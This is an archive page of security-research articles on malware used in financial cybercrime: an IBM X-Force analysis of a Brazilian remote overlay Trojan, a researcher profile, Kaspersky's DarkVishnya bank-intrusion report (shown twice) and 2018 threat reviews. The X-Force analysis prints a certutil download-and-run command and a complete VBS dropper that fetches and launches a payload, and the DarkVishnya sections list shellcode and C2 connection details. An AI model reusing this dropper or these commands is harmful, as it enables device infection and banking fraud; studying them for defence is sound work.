Category Archives: Financial malware

The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime

In the first article of this two-part series, we covered recent infection and fraud tactics, techniques and procedures (TTPs) used against Brazilian internet users. In this second post, we’ll cover the analysis of a popular remote overlay Trojan used by financial cybercrime actors in Brazil.

Remote overlay malware is quite prolific and generic, and although it happens now and then, it is generally rare to find financial malware in Brazil that could be deemed special or sophisticated. So what’s special about this particular variant? To begin, the dynamic link library (DLL) hijacking technique is not very common, although we have seen it before in Brazil. More interestingly, it seems that the malware’s operators are no longer focused on banks alone; they are now also interested in stealing users’ cryptocurrency exchange accounts, which ties in well with the growing appetite financial cybercrime has for cryptocurrency in Brazil.

Compromising Brazilian Users One Remote Session at a Time

IBM X-Force research follows the Brazilian threat landscape on an ongoing basis. In recent analyses, our team observed a new malware variant from the remote overlay family infecting users in the region.

Remote overlay Trojans are very common among Brazilian fraudsters who target local users. A recent generic variant we analyzed is able to remotely control infected devices using a DLL hijacking technique to load its malicious code into a legitimate binary file of a free antivirus program.

The malicious DLL, which is written in the Delphi programming language typical of Brazilian malware, contains overlay images that the malware plasters over the screen after an infected user authenticates an online banking session. The screens are made to match the look and feel of the victim’s bank and trick victims into providing personal information and two-factor authentication (2FA) elements.

Read the white paper: Preserving trust in digital financial services

Rising Interest in Cryptocurrency

Cryptocurrency trading accounts are becoming more popular than traditional brokerage accounts in Brazil — a trend that local fraudsters are likely familiar with and poised to exploit.

Variants we analyzed in recent campaigns against the major banks in Brazil also targeted cryptocurrency exchange platforms. The attack method is similar to how banks are targeted: by stealing the user’s account credentials, taking over their account and transferring their money to the criminals’ accounts.

A Typical Infection Routine

A look into the infection routine of this remote overlay Trojan shows that the initial compromise happens when a potential victim is lured into downloading what he or she believes to be an official invoice. The file is an archive that harbors the malicious scripts that will ultimately infect the device. Below is a summary of the typical infection tactic:

  1. The victim uses a search engine to find his or her provider’s website and pay a monthly invoice. Instead of the genuine website, the first result is a malicious page that attackers have boosted with paid efforts. The victim accesses that page and keys in his or her identification details to fetch the invoice.
  2. The victim unknowingly downloads a malicious LNK file — a Windows shortcut file — archived inside a ZIP file purporting to be from DETRAN, the ministry of transportation in Brazil.
  3. The LNK file contains a command that will download a malicious Visual Basic (VBS) script from a remote server and run it with a legitimate Windows program, certutil.
  4. The malicious VBS script downloads an additional ZIP file from the attacker’s remote server, this time containing the malware’s malicious DLL payload as well as a legitimate binary file of a free antivirus program it will use to hide the DLL.
  5. The VBS script executes the malware, infecting the device.
  6. Once deployed, the Trojan uses a DLL hijacking technique to load its malicious DLL into the legitimate binary of the antivirus program. This roundabout infection routine helps the malware evade detection by security controls.
  7. After completing the installation, the malware monitors the victim’s browser and goes into action when the victim navigates to a targeted online banking website or cryptocurrency exchange platform.
  8. The malicious DLL component gives the malware its remote control capabilities.

Zooming In on the Malicious LNK File

A closer look at the LNK file reveals the way it abuses certutil, which is installed as part of Certificate Services.

First, the malicious script is downloaded from the remote server under the name “tudodebom”:

“C:\Windows\System32\cmd.exe /V /C certutil.exe -urlcache -split -f “https://remoteserver/turbulencianoar/tudodebom.txt” %temp%\tudodebom.txt && cd %temp% && rename “tudodebom.txt
  • -urlcache displays or deletes URL cache entries.
  • -split -f forces fetching of a specific URL and updating of the cache.

Once retrieved, the malware changes the file’s name and extension from “tudodebom.txt” to “JNSzlEYAIubkggX.vbs”:

“JNSzlEYAIubkggX.vbs” && C:\windows\system32\cmd.exe /k JNSzlEYAIubkggX.vbs

The LNK file invokes the Windows command line (CMD) and executes certutil.exe to download a TXT file (.vbs) from a remote host:

hXXps://remoteserver/turbulencianoar/tudodebom.txt

Lastly, the malware executes the malicious VBS script.

Examining the VBS Script

The VBS script downloads the ZIP archive containing the malware payload. It then deploys it on the victim’s device in a directory with the following naming pattern:

“C:\AV product_” + RandomName + “\”

After that process is complete, the script executes the legitimate, but poisoned, binary that will load the malicious DLL and start a connection to the attacker’s command and control (C&C) server.

Interesting elements in this routine include:

  • The use of legitimate remote servers to host attack tools;
  • The abuse of a legitimate binary from an existing antivirus program to hide the malware’s DLL; and
  • The naming convention of the malware, which can make the malware easier to detect and quarantine on infected devices.

Upon analyzing the malware, we found the VBS script that the Trojan uses to deploy its malicious DLL to contain the following:

Dim ubase, randname, exerandom, deffolder, filesuccess, filezip, fileexe, filedll

Set objShell = CreateObject( “WScript.Shell” )

ubase = “https://remoteserver/turbulencianoar/AuZwaaU.zip”

randname = getrandomstring()

exerandom = “AV product.SystrayStartTrigger-” + randname

filezip = “AuZwaaU.zip”

deffolder = “C:\AV product_” + randname + “\”

filesuccess = objShell.ExpandEnvironmentStrings(“%TEMP%”) + “\java_install.log”

fileexe = “AuZwaaU.exe”

filedll = “AuZwaaU.sys”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(filesuccess)) Then

WScript.Quit

End If

If not (objFSO.FileExists(filezip)) Then

Set objFile = objFSO.CreateTextFile(filesuccess, True)

objFile.Write ” ”

objFile.Close

‘WScript.Echo msg

dim xHttp: Set xHttp = createobject(“Microsoft.XMLHTTP”)

dim bStrm: Set bStrm = createobject(“Adodb.Stream”)

xHttp.Open “GET”, ubase, False

xHttp.Send

with bStrm

.type = 1

.open

.write xHttp.responseBody

.savetofile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip, 2

end with

WScript.Sleep 5000

set objShellApp = CreateObject(“Shell.Application”)

set FilesInZip=objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip).items

objShellApp.NameSpace(objShell.ExpandEnvironmentStrings(“%TEMP%”)).CopyHere(FilesInZip)

WScript.Sleep 5000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filezip

objFSO.CreateFolder deffolder

WScript.Sleep 3000

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & fileexe, deffolder & exerandom & “.exe”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & filedll, deffolder & “AV product.OE.NativeCore.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcp120.sys”, deffolder & “msvcp120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\msvcr120.sys”, deffolder & “msvcr120.dll”

objFSO.MoveFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\LOG”, deffolder & “LOG”

WScript.Sleep 5000

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

Set objShell = CreateObject( “WScript.Shell” )

outFile = objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objFile = objFSO.CreateTextFile(outFile,True)

objFile.Write “@echo off” & vbCrLf

objFile.Write “@cd ” & deffolder & vbCrLf

objFile.Write “start ” & exerandom & “.exe” & vbCrLf

objFile.Close

objShell.Exec(objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”)

WScript.Sleep 10000

objFSO.DeleteFile objShell.ExpandEnvironmentStrings(“%TEMP%”) & “\” & randname & “.bat”

Set objShell = Nothing

Set objFSO = Nothing

Set objShellApp = Nothing

End If

Function getrandomstring()

Dim intMax, k, intValue, strChar, strName

Const Chars = “abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ”

intMax = 6

Randomize()

strName = “”

For k = 1 To intMax

intValue = Fix(62 * Rnd())

strChar = Mid(Chars, intValue + 1, 1)

Randomize()

intValue = Fix(62 * Rnd())

strChar = strChar & Mid(Chars, intValue + 1, 1)

strName = strName & strChar

If (k < 6) Then

strName = strName & “”

End If

Next

getrandomstring = strName

End Function

Remote Overlay Images

Last but not least, the overlay images the malware hosts are no longer exclusive to banks. Our analysis shows that fraudsters in Brazil are just as interested in robbing users of their cryptocurrency.

To accomplish this goal, the threat actors have created a number of overlays to match platforms used in Brazil (we have censored the platform’s logo below). In each case, the attackers prompt the user to verify his or her email address and identity and confirms the user’s security with a fresh one-time password from their tokenization method.

Brazilian remote overlay Trojan

Figure 1: Fake overlay screen asks users to provide information about their identity.

Remote Overlay Brazilian Malware is after cryptocurrency

Figure 2: Fake overlay screen asks users to submit a token code.

Overlays for 2FA requests match the targeted platform’s preference of user authentication elements and include single sign-on (SSO) from email and social accounts:

Brazilian Remote Overlay Malware Asks for SSO

Figure 3: Fake overlay screen asks infected users to use SSO authentication from their webmail/social accounts.

Mitigate Financial Cybercrime Risks

Malware in Brazil is one of the most prolific tactics used by cybercriminals to defraud internet users. Although infection rates can be high for campaigns due to the large number of users affected by each attack, the risks can be mitigated with continued user education and by placing the right controls on user devices to help protect against malware.

Read the white paper: Preserving trust in digital financial services


The post The Simpler the Better? Looking Deeper Into the Malware Used in Brazilian Financial Cybercrime appeared first on Security Intelligence.

How Tomer Agayev Fights Financial Fraud Through Curiosity, Suspicion and Education

Tomer Agayev leads a security team that keeps our hard-earned savings safe from fraudsters.

As threat research team lead at IBM Trusteer, Tomer guards the gateway to threats both known and unknown. His team’s responsibility is to monitor new and emerging threats, understand them intimately, and feed information to the cybersecurity protection content development teams so they know how to best defend against financial fraud.

The products developed by Tomer’s Trusteer colleagues are deployed by the world’s biggest financial institutions to protect their clients against malware, phishing, social engineering and more, and their success is largely thanks to Tomer’s penchant for figuring out what makes threat actors tick.

The World of Security Is ‘Pretty Amazing’

Tomer previously served in the Israeli Defense Forces and spent his last year of service as a system administrator and IT team leader. So when he entered the civilian workforce, information security was an obvious first port of call.

Tomer joined Trusteer in March 2013 as a help desk representative, but it wasn’t long before he felt he needed a change.

“I wanted to expand my knowledge, especially in a company like this that deals with information security at its heart,” he said. “That whole world is pretty amazing, and I knew there was more to learn and accomplish.”

So he spoke to managers and human resources, eager for an opportunity to grow and “make myself something bigger.” Luckily, Trusteer is a supportive and nurturing environment to work in, Tomer emphasized, and he soon began a new role as a security threat researcher.

Social Security: How Tomer Educates the Masses

One of the most common types of attack Tomer’s team encounters is social engineering.

“Most of the time, the threats will target the bank’s customers themselves; it’s the most popular attack,” he said.

He mentioned the work his team has done in Brazil to combat phone-based schemes: Fraudsters call businesses, introduce themselves as bank employees, and then trick customers into installing malware on their machines or prompt them to disclose their credentials.

It’s difficult to combat social engineering because it comes down to education, Tomer explained. Still, his team works tirelessly to research these cases and feed banks information to educate their customers about threats. By analyzing the malware, he said, the team can protect against malicious action regardless of social engineering.

“Even if the fraudster tries an attack, it would fail because our products are better and more powerful,” he said.

Still, it’s impossible for any mere human to keep up with the ever-evolving threat landscape, which is why the Trusteer team works with many automated processes. Tomer spoke proudly of its lab, which analyzes around half a million malware samples every year. As valuable as automation is, however, this analysis is augmented by manual hunting.

“This is one of the strengths of our threat research team,” he said. “We need to be in the trenches to know what’s going on, even if it’s not coming from the threat intelligence feeds we established,” he said.

Even if a threat hasn’t yet targeted the financial world, it’s still on Tomer’s radar; the Trusteer team often sees techniques shared across threat actors, he said.

Tomer Agayev fights financial fraud for IBM Trusteer

A Threat Researcher Never Stops Learning

The life of a threat researcher is fast-paced and high-stakes, and there are new and unprecedented challenges to overcome every day. But that doesn’t bother Tomer in the slightest.

“It’s a lot of fun,” he said. “You need to learn all the time, which is something very important to me. When I’m stuck in one place that doesn’t challenge me, it’s a problem.”

In his free time, Tomer prefers quieter pursuits, such as nature photography and spending time with his wife.

“It’s the quiet; it’s very peaceful,” Tomer said of his photography hobby. “A lot of times, I find nature more fascinating than even a beautiful city landscape. It’s just so big and vast.”

Why You Should Always Be Suspicious

To work as a threat researcher, Tomer emphasized, you need to be curious, suspicious and ready to question what other people say. While conducting forensic analyses, threat researchers strive to “collect all the pieces of the puzzle” in order to recreate the entire scenario enacted by the fraudsters. Tomer likened this aspect of the job to solving a new mystery with each instance of fraud.

“In order to understand fraud, sometimes you need to think like a fraudster,” he said. “We need to try to understand how the other side would think to better understand how to combat them.”

Tomer also wants to make sure his friends and family are educated and aware of how to spot the fraud schemes that his team encounters so often.

“It’s a bit harsh to say, but the internet is not a safe place,” he said. “People just need to be aware that not everything that shines is a diamond.”

Meet Fraud Analyst Shir Levin

The post How Tomer Agayev Fights Financial Fraud Through Curiosity, Suspicion and Education appeared first on Security Intelligence.

Securelist: DarkVishnya: Banks attacked through direct connection to local network

While novice attackers, imitating the protagonists of the U.S. drama Mr. Robot, leave USB flash drives lying around parking lots in the hope that an employee from the target company picks one up and plugs it in at the workplace, more experienced cybercriminals prefer not to rely on chance. In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

High-tech tables with sockets are great for planting hidden devices

High-tech tables with sockets are great for planting hidden devices

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. To overcome the firewall restrictions, they planted shellcodes with local TCP servers. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels.

Having succeeded, the cybercriminals proceeded to stage three. Here they logged into the target system and used remote access software to retain access. Next, malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies. If they encountered a whitelisting that could not be bypassed, or PowerShell was blocked on the target computer, the cybercriminals used impacket, and winexesvc.exe or psexec.exe to run executable files remotely.

Verdicts

not-a-virus.RemoteAdmin.Win32.DameWare
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg
HEUR:Trojan.Multi.Powecod
HEUR:Trojan.Win32.Betabanker.gen
not-a-virus:RemoteAdmin.Win64.WinExe
Trojan.Win32.Powershell
PDM:Trojan.Win32.CmdServ
Trojan.Win32.Agent.smbe
HEUR:Trojan.Multi.Powesta.b
HEUR:Trojan.Multi.Runner.j
not-a-virus.RemoteAdmin.Win32.PsExec

Shellcode listeners

tcp://0.0.0.0:5190
tcp://0.0.0.0:7900

Shellcode connects

tcp://10.**.*.***:4444
tcp://10.**.*.**:4445
tcp://10.**.*.**:31337

Shellcode pipes

\\.\xport
\\.\s-pipe



Securelist

DarkVishnya: Banks attacked through direct connection to local network

While novice attackers, imitating the protagonists of the U.S. drama Mr. Robot, leave USB flash drives lying around parking lots in the hope that an employee from the target company picks one up and plugs it in at the workplace, more experienced cybercriminals prefer not to rely on chance. In 2017-2018, Kaspersky Lab specialists were invited to research a series of cybertheft incidents. Each attack had a common springboard: an unknown device directly connected to the company’s local network. In some cases, it was the central office, in others a regional office, sometimes located in another country. At least eight banks in Eastern Europe were the targets of the attacks (collectively nicknamed DarkVishnya), which caused damage estimated in the tens of millions of dollars.

Each attack can be divided into several identical stages. At the first stage, a cybercriminal entered the organization’s building under the guise of a courier, job seeker, etc., and connected a device to the local network, for example, in one of the meeting rooms. Where possible, the device was hidden or blended into the surroundings, so as not to arouse suspicion.

High-tech tables with sockets are great for planting hidden devices

High-tech tables with sockets are great for planting hidden devices

The devices used in the DarkVishnya attacks varied in accordance with the cybercriminals’ abilities and personal preferences. In the cases we researched, it was one of three tools:

  • netbook or inexpensive laptop
  • Raspberry Pi computer
  • Bash Bunny, a special tool for carrying out USB attacks

Inside the local network, the device appeared as an unknown computer, an external flash drive, or even a keyboard. Combined with the fact that Bash Bunny is comparable in size to a USB flash drive, this seriously complicated the search for the entry point. Remote access to the planted device was via a built-in or USB-connected GPRS/3G/LTE modem.

At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. At the same time, the attackers tried to brute-force or sniff login data for such machines. To overcome the firewall restrictions, they planted shellcodes with local TCP servers. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels.

Having succeeded, the cybercriminals proceeded to stage three. Here they logged into the target system and used remote access software to retain access. Next, malicious services created using msfvenom were started on the compromised computer. Because the hackers used fileless attacks and PowerShell, they were able to avoid whitelisting technologies and domain policies. If they encountered a whitelisting that could not be bypassed, or PowerShell was blocked on the target computer, the cybercriminals used impacket, and winexesvc.exe or psexec.exe to run executable files remotely.

Verdicts

not-a-virus.RemoteAdmin.Win32.DameWare
MEM:Trojan.Win32.Cometer
MEM:Trojan.Win32.Metasploit
Trojan.Multi.GenAutorunReg
HEUR:Trojan.Multi.Powecod
HEUR:Trojan.Win32.Betabanker.gen
not-a-virus:RemoteAdmin.Win64.WinExe
Trojan.Win32.Powershell
PDM:Trojan.Win32.CmdServ
Trojan.Win32.Agent.smbe
HEUR:Trojan.Multi.Powesta.b
HEUR:Trojan.Multi.Runner.j
not-a-virus.RemoteAdmin.Win32.PsExec

Shellcode listeners

tcp://0.0.0.0:5190
tcp://0.0.0.0:7900

Shellcode connects

tcp://10.**.*.***:4444
tcp://10.**.*.**:4445
tcp://10.**.*.**:31337

Shellcode pipes

\\.\xport
\\.\s-pipe

Kaspersky Security Bulletin 2018. Statistics

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity. All the statistics were collected from November 2017 to October 2018.

The year in figures

  • 30 .01% of user computers were subjected to at least one Malware-class web attack over the year.
  • Kaspersky Lab solutions repelled 1 876 998 691 attacks launched from online resources located all over the world.
  • 554 159 621 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 21 643 946 unique malicious objects.
  • 765 538 computers of unique users were targeted by encryptors.
  • 5 638 828 computers of unique users were targeted by miners.
  • Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 830 135 devices.

Fill the form below to download the Kaspersky Security Bulletin 2018. Statistics full report (English, PDF):

Securelist: Kaspersky Security Bulletin 2018. Statistics

All the statistics used in this report were obtained using Kaspersky Security Network (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity. All the statistics were collected from November 2017 to October 2018.

The year in figures

  • 30 .01% of user computers were subjected to at least one Malware-class web attack over the year.
  • Kaspersky Lab solutions repelled 1 876 998 691 attacks launched from online resources located all over the world.
  • 554 159 621 unique URLs were recognized as malicious by web antivirus components.
  • Kaspersky Lab’s web antivirus detected 21 643 946 unique malicious objects.
  • 765 538 computers of unique users were targeted by encryptors.
  • 5 638 828 computers of unique users were targeted by miners.
  • Kaspersky Lab solutions blocked attempts to launch malware capable of stealing money via online banking on 830 135 devices.

Fill the form below to download the Kaspersky Security Bulletin 2018. Statistics full report (English, PDF):



Securelist

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

